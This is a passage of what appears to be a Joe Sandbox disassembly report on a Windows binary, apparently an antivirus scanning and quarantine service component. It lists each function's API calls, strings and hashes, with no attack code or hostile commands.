SYSTEM\CurrentControlSet\Services\vseamps\Parameters, xrefs: 0000000140002FD5

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CriticalSection$EnterLeave$CloseCreateValue
String ID: ?$SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
API String ID: 93015348-1041928032
Opcode ID: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
Instruction ID: 955b1bef443a43e40f7389cebc0d05d3cfed999bfec6c75915e9fb821c1678e4
Opcode Fuzzy Hash: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
Instruction Fuzzy Hash: E3714676211A4082E762CB26F8507DA73A5F78D7E4F141226FB6A4B7F4DB3AC485C700

Function 000000014000F000 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 152libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F042
GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F05E
GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F086
GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F0A5
GetProcAddress.KERNEL32 ref: 000000014000F0F3
GetProcAddress.KERNEL32 ref: 000000014000F117

Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2

Strings

MessageBoxA, xrefs: 000000014000F054
GetUserObjectInformationA, xrefs: 000000014000F0E9
GetActiveWindow, xrefs: 000000014000F075
GetLastActivePopup, xrefs: 000000014000F094
USER32.DLL, xrefs: 000000014000F03B
GetProcessWindowStation, xrefs: 000000014000F10D

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: AddressProc$Load$Library
String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
API String ID: 3981747205-232180764
Opcode ID: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
Instruction ID: 2f5902004a3f6de811dc5f380475ae1a3efdd32c0186a6d00da0f9ae6c345c7d
Opcode Fuzzy Hash: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
Instruction Fuzzy Hash: FE515CB561674181FE66EB63B850BFA2290BB8D7D0F484025BF4E4BBB1EF3DC445A210

Function 0000000140002B40 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 141libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 0000000140002B91
GetProcAddress.KERNEL32 ref: 0000000140002BAD
GetProcAddress.KERNEL32 ref: 0000000140002BC8
GetProcAddress.KERNEL32 ref: 0000000140002BE3
EnterCriticalSection.KERNEL32 ref: 0000000140002C0D
LeaveCriticalSection.KERNEL32 ref: 0000000140002C9A
EnterCriticalSection.KERNEL32 ref: 0000000140002CAF
LeaveCriticalSection.KERNEL32 ref: 0000000140002D2D

Strings

vseqrtRelease, xrefs: 0000000140002BBA
vseqrtAdd, xrefs: 0000000140002BD5
vseqrtInit, xrefs: 0000000140002BA3
vseqrt.dll, xrefs: 0000000140002B7E

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CriticalSection$AddressProc$EnterLeave$LibraryLoad
String ID: vseqrt.dll$vseqrtAdd$vseqrtInit$vseqrtRelease
API String ID: 3682727354-300733478
Opcode ID: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
Instruction ID: 5756194132ff8dd7ec1522ad033bffa79c37130547d86cec9d6c1639cfe77c95
Opcode Fuzzy Hash: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
Instruction Fuzzy Hash: 8C710175220B4186EB52DF26F894BC533A4F78CBE4F441226EA598B3B4DF3AC945C740

Function 00000001400033E0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 126memorytimeCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140003406
SetWaitableTimer.KERNEL32 ref: 0000000140003432
#4.VSELOG ref: 000000014000346A
GetProcessHeap.KERNEL32 ref: 000000014000351C
HeapReAlloc.KERNEL32 ref: 0000000140003531
GetProcessHeap.KERNEL32 ref: 0000000140003539
HeapAlloc.KERNEL32 ref: 0000000140003547
#4.VSELOG ref: 00000001400035DD
LeaveCriticalSection.KERNEL32 ref: 00000001400035E9
LeaveCriticalSection.KERNEL32 ref: 00000001400035FA

Strings

amps_Init: done, pHandle=%p, xrefs: 00000001400035CC
amps_Init: iFlags=%d, pid=%d, sid=%d, xrefs: 0000000140003452

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: Heap$CriticalSection$AllocLeaveProcess$EnterTimerWaitable
String ID: amps_Init: done, pHandle=%p$amps_Init: iFlags=%d, pid=%d, sid=%d
API String ID: 2587151837-1427723692
Opcode ID: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
Instruction ID: a7c4065e0455d4df5ce4727384a6dec66c16779501c9bb3b2af2b379a082be6c
Opcode Fuzzy Hash: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
Instruction Fuzzy Hash: 9F5114B5225B4082FB13CB27F8847D963A5F78CBD0F445525BB4A4B7B8DB7AC4448700

Function 0000000140004D10 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 81libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000000140004D43
GetProcAddress.KERNEL32 ref: 0000000140004D62
GetFileAttributesW.KERNEL32 ref: 0000000140004DE9
LoadLibraryW.KERNEL32 ref: 0000000140004DF7
GetCurrentDirectoryW.KERNEL32 ref: 0000000140004E1C
SetCurrentDirectoryW.KERNEL32 ref: 0000000140004E27
LoadLibraryW.KERNEL32 ref: 0000000140004E30
SetCurrentDirectoryW.KERNEL32 ref: 0000000140004E41

Strings

kernel32.dll, xrefs: 0000000140004D3C
SetDllDirectoryW, xrefs: 0000000140004D58

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CurrentDirectory$LibraryLoad$AddressAttributesFileHandleModuleProc
String ID: SetDllDirectoryW$kernel32.dll
API String ID: 3184163350-3826188083
Opcode ID: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
Instruction ID: 3ea874f08b0d6ae9fbaedd0e680489d05007b391355801732f4c7fbd06edc96d
Opcode Fuzzy Hash: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
Instruction Fuzzy Hash: FD41F6B1218A8582EB22DF12F8547DA73A5F79D7D4F400125EB8A0BAB5DF7EC548CB40

Function 0000000140004BA0 Relevance: 18.1, APIs: 9, Strings: 3, Instructions: 80memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 0000000140004BE7
GetProcessHeap.KERNEL32 ref: 0000000140004BF6
HeapAlloc.KERNEL32 ref: 0000000140004C04
lstrlenW.KERNEL32 ref: 0000000140004C3E
GetProcessHeap.KERNEL32 ref: 0000000140004C4D
HeapAlloc.KERNEL32 ref: 0000000140004C5B
lstrlenW.KERNEL32 ref: 0000000140004C8E
GetProcessHeap.KERNEL32 ref: 0000000140004C9D
HeapAlloc.KERNEL32 ref: 0000000140004CAB

Strings

ampIfEp, xrefs: 0000000140004C29, 0000000140004C6E
ncalrpc, xrefs: 0000000140004BAF, 0000000140004C17
Security=impersonation static true, xrefs: 0000000140004C80, 0000000140004CBE

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: Heap$AllocProcesslstrlen
String ID: Security=impersonation static true$ampIfEp$ncalrpc
API String ID: 3424473247-996641649
Opcode ID: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
Instruction ID: 5475aedf582102907cd33adbfaf34f9b11ebc9e91273ce6565e0ea0cfbbdf015
Opcode Fuzzy Hash: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
Instruction Fuzzy Hash: FE3137B062A74082FB03CB53BD447E962A5E75DBD8F554019EB0E0BBB6DBBEC1558700

Function 000000014000A740 Relevance: 16.9, APIs: 11, Instructions: 354COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32 ref: 000000014000A7AA
GetLastError.KERNEL32 ref: 000000014000A7BA
MultiByteToWideChar.KERNEL32 ref: 000000014000A874
MultiByteToWideChar.KERNEL32 ref: 000000014000A921
LCMapStringW.KERNEL32 ref: 000000014000A944
LCMapStringW.KERNEL32 ref: 000000014000A98D
LCMapStringW.KERNEL32 ref: 000000014000AA24
WideCharToMultiByte.KERNEL32 ref: 000000014000AA65
LCMapStringA.KERNEL32 ref: 000000014000AB13
LCMapStringA.KERNEL32 ref: 000000014000ABC6
LCMapStringA.KERNEL32 ref: 000000014000AC4C

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: String$ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1775797328-0
Opcode ID: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
Instruction ID: 7820e0e177e3580e7fbac086e7e180635334a87404cd07a7d6eea56579f34d7e
Opcode Fuzzy Hash: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
Instruction Fuzzy Hash: 7CE18BB27007808AEB66DF26A54079977E1F74EBE8F144225FB6957BE8DB38C941C700

Function 0000000140009C30 Relevance: 16.6, APIs: 11, Instructions: 150COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C52
GetLastError.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C6C
GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C91
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CD4
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CF2
GetEnvironmentStrings.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D09
MultiByteToWideChar.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D37
FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D73
FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009E19

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
String ID:
API String ID: 1232609184-0
Opcode ID: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
Instruction ID: a97fb2b29f1dbdd40f84dfefdd532c69b8fe37edd6617e3b903b273dff31e607
Opcode Fuzzy Hash: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
Instruction Fuzzy Hash: 9851AEB164564046FB66DF23B8147AA66D0BB4DFE0F484625FF6A87BF1EB78C4448300

Function 0000000140002740 Relevance: 16.6, APIs: 10, Strings: 1, Instructions: 129memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140001A30: EnterCriticalSection.KERNEL32 ref: 0000000140001AA6
Part of subcall function 0000000140001A30: LeaveCriticalSection.KERNEL32 ref: 0000000140001B30
Part of subcall function 0000000140001A30: EnterCriticalSection.KERNEL32 ref: 0000000140001B48
Part of subcall function 0000000140001A30: LeaveCriticalSection.KERNEL32 ref: 0000000140001BC9
Part of subcall function 0000000140001A30: EnterCriticalSection.KERNEL32 ref: 0000000140001BE6

EnterCriticalSection.KERNEL32 ref: 00000001400027B2
LeaveCriticalSection.KERNEL32 ref: 000000014000286E
GetProcessHeap.KERNEL32 ref: 000000014000287F
HeapFree.KERNEL32 ref: 000000014000288D
GetProcessHeap.KERNEL32 ref: 000000014000289D
HeapFree.KERNEL32 ref: 00000001400028AB
GetProcessHeap.KERNEL32 ref: 00000001400028BB
HeapFree.KERNEL32 ref: 00000001400028C9
GetProcessHeap.KERNEL32 ref: 00000001400028D9
HeapFree.KERNEL32 ref: 00000001400028E7

Strings

H, xrefs: 000000014000278C

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: Heap$CriticalSection$EnterFreeProcess$Leave
String ID: H
API String ID: 2107338056-2852464175
Opcode ID: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
Instruction ID: c1f1c0cc251b461ea163c40135a27997c94af954a8846501eddf5ed74a01cb36
Opcode Fuzzy Hash: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
Instruction Fuzzy Hash: D5513B76216B4086EBA2DF63B84439A73E5F74DBD0F098128EB9D87765EF39C4558300

Function 0000000140003200 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 100timeCOMMON

Download Yara Rule

APIs

#4.VSELOG ref: 0000000140003242
EnterCriticalSection.KERNEL32 ref: 0000000140003257
LeaveCriticalSection.KERNEL32 ref: 00000001400032D9
#4.VSELOG ref: 0000000140003353

Part of subcall function 0000000140002B40: LoadLibraryW.KERNEL32 ref: 0000000140002B91
Part of subcall function 0000000140002B40: GetProcAddress.KERNEL32 ref: 0000000140002BAD
Part of subcall function 0000000140002B40: GetProcAddress.KERNEL32 ref: 0000000140002BC8
Part of subcall function 0000000140002B40: GetProcAddress.KERNEL32 ref: 0000000140002BE3
Part of subcall function 0000000140002B40: EnterCriticalSection.KERNEL32 ref: 0000000140002C0D
Part of subcall function 0000000140002B40: LeaveCriticalSection.KERNEL32 ref: 0000000140002C9A
Part of subcall function 0000000140002B40: EnterCriticalSection.KERNEL32 ref: 0000000140002CAF
Part of subcall function 0000000140002B40: LeaveCriticalSection.KERNEL32 ref: 0000000140002D2D

#4.VSELOG ref: 0000000140003389
SetWaitableTimer.KERNEL32 ref: 00000001400033BE

Strings

fnCallback: hScan=%d, putting event %d into listening threads queues, xrefs: 0000000140003372
fnCallback: hScan=%d, evId=%d, context=%p, xrefs: 000000014000323B
fnCallback: hScan=%d, quarantine, result %d, xrefs: 000000014000333F

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CriticalSection$AddressEnterLeaveProc$LibraryLoadTimerWaitable
String ID: fnCallback: hScan=%d, evId=%d, context=%p$fnCallback: hScan=%d, putting event %d into listening threads queues$fnCallback: hScan=%d, quarantine, result %d
API String ID: 1322048431-2685357988
Opcode ID: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
Instruction ID: ba1df9fb3c509f4e652456910b8147ac8aac6905a945631cefe2604201aedb7e
Opcode Fuzzy Hash: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
Instruction Fuzzy Hash: 645106B5214B4181EB13CF16F880BD923A4E79DBE4F445622BB594B6B4DF3AC584C740

Function 0000000140003D50 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 75timeCOMMON

Download Yara Rule

APIs

#4.VSELOG(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003D84
EnterCriticalSection.KERNEL32(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003DA3
#4.VSELOG(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003E19
LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003E25
#4.VSELOG(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003E66
SetWaitableTimer.KERNEL32 ref: 0000000140003EA6

Strings

doCleanup: enter, cAmpEntry %p, xrefs: 0000000140003D76
doCleanup: pid %d, removing cAmpEntry, index is %d, xrefs: 0000000140003E08
doCleanup: pid %d, marking the cAmpEntry pointer for deletion, xrefs: 0000000140003E58

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CriticalSection$EnterLeaveTimerWaitable
String ID: doCleanup: enter, cAmpEntry %p$doCleanup: pid %d, marking the cAmpEntry pointer for deletion$doCleanup: pid %d, removing cAmpEntry, index is %d
API String ID: 2984211723-3002863673
Opcode ID: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
Instruction ID: 6ce834a9fa2c46ab9e722fc1bcf1c858386cde021ca473021475461b430fce50
Opcode Fuzzy Hash: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
Instruction Fuzzy Hash: 9B4101B5214A8591EB128F07F880B9863A4F78CBE4F495226FB1D0BBB4DB7AC591C710

Function 00000001400021A0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 65COMMON

Download Yara Rule

APIs

#4.VSELOG ref: 00000001400021D4
OpenProcess.KERNEL32 ref: 00000001400021F7
#4.VSELOG ref: 000000014000223A
WaitForMultipleObjects.KERNEL32 ref: 000000014000224F
CloseHandle.KERNEL32 ref: 000000014000225A
#4.VSELOG ref: 0000000140002294

Strings

doMonitor: monitoring process id=%d, xrefs: 000000014000222C
fnMonitor: monitor thread for ctx %p, xrefs: 00000001400021C6
doMonitor: end process id=%d, result from WaitForMultipleObjects=%d, xrefs: 0000000140002283

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: CloseHandleMultipleObjectsOpenProcessWait
String ID: doMonitor: end process id=%d, result from WaitForMultipleObjects=%d$doMonitor: monitoring process id=%d$fnMonitor: monitor thread for ctx %p
API String ID: 678758403-4129911376
Opcode ID: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
Instruction ID: f397f01a700ed75a1720fb106c04e764a2ecaef09c032a262f7e58a7780e1373
Opcode Fuzzy Hash: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
Instruction Fuzzy Hash: B63107B6610A4582EB12DF57F84079963A4E78CBE4F498122FB1C0B7B4DF3AC585C710

Function 0000000140001750 Relevance: 15.1, APIs: 12, Instructions: 133memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 0000000140001797
GetProcessHeap.KERNEL32 ref: 00000001400017A6
HeapAlloc.KERNEL32 ref: 00000001400017B4
lstrlenW.KERNEL32 ref: 00000001400017EC
GetProcessHeap.KERNEL32 ref: 00000001400017FB
HeapAlloc.KERNEL32 ref: 0000000140001809
lstrlenW.KERNEL32 ref: 000000014000183F
GetProcessHeap.KERNEL32 ref: 000000014000184E
HeapAlloc.KERNEL32 ref: 000000014000185C
lstrlenW.KERNEL32 ref: 000000014000188D
GetProcessHeap.KERNEL32 ref: 000000014000189C
HeapAlloc.KERNEL32 ref: 00000001400018AA

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: Heap$AllocProcesslstrlen
String ID:
API String ID: 3424473247-0
Opcode ID: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
Instruction ID: a11592c0991bfac199573d0d609f53e0c1426f0a5ad78f28403dae96cf8670eb
Opcode Fuzzy Hash: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
Instruction Fuzzy Hash: C8513AB6701640CAE666DFA3B84479A67E0F74DFC8F588428AF4E4B721DA38D155A700

Function 0000000140012C70 Relevance: 14.4, APIs: 4, Strings: 4, Instructions: 415COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0000000140011270: RtlLookupFunctionEntry.KERNEL32 ref: 00000001400112F1

__GetUnwindTryBlock.LIBCMT ref: 0000000140012CDD
__SetUnwindTryBlock.LIBCMT ref: 0000000140012D05
__GetUnwindTryBlock.LIBCMT ref: 0000000140012D15
_SetThrowImageBase.LIBCMT ref: 0000000140012DA6

Strings

csm, xrefs: 0000000140012DC1
csm, xrefs: 0000000140012D2F
csm, xrefs: 0000000140012E97
bad exception, xrefs: 0000000140012E4A

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2897783402.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897816565.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897829506.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2897843886.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_Y1mbCC.jbxd

Similarity

API ID: BlockUnwind$BaseEntryFunctionImageLookupThrow
String ID: bad exception$csm$csm$csm
API String ID: 3766904988-820278400
Opcode ID: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
Instruction ID: ec44bdd804db6766ea80e989845e9f4c5c79a3e5de674617e5e8a62493c248da
Opcode Fuzzy Hash: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
Instruction Fuzzy Hash: 2202C17220478086EB66DB27A4447EEB7A5F78DBC4F484425FF894BBAADB39C550C700

Function 0000000140004750 Relevance: 13.6, APIs: 9, Instructions: 80sleepCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140004A0F
LeaveCriticalSection.KERNEL32 ref: 0000000140004A1D
WaitForMultipleObjects.KERNEL32 ref: 0000000140004A44
Sleep.KERNEL32 ref: 0000000140004A75
EnterCriticalSection.KERNEL32 ref: 0000000140004A7F
SetEvent.KERNEL32 ref: 0000000140004AC5
ResetEvent.KERNEL32 ref: 0000000140004ACF
LeaveCriticalSection.KERNEL32 ref: 0000000140004AD9
WaitForMultipleObjects.KERNEL32 ref: 0000000140004B0D

Memory Dump Source

Source File: 00000007.00000002.2897798926.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

